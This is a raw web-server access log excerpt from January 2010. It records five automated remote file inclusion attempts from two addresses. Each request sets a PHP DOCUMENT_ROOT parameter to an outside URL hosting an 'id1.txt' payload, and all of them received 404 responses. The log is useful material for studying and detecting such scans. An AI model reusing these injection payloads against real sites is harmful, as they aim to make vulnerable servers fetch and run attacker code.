170.210.192.78 - - [05/Jan/2010:04:28:43 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
170.210.192.78 - - [05/Jan/2010:04:28:43 -0500] "GET /logs/access_log.Q109092200//index.php?DOCUMENT_ROOT=http://phoviet.vn.net//backend/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:29:01 -0500] "GET /main.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:29:01 -0500] "GET /logs/access_log.Q109072900%20%20/main.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.160.17.200 - - [05/Jan/2010:04:29:01 -0500] "GET /logs/main.php/?_SERVER[DOCUMENT_rOOT]=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
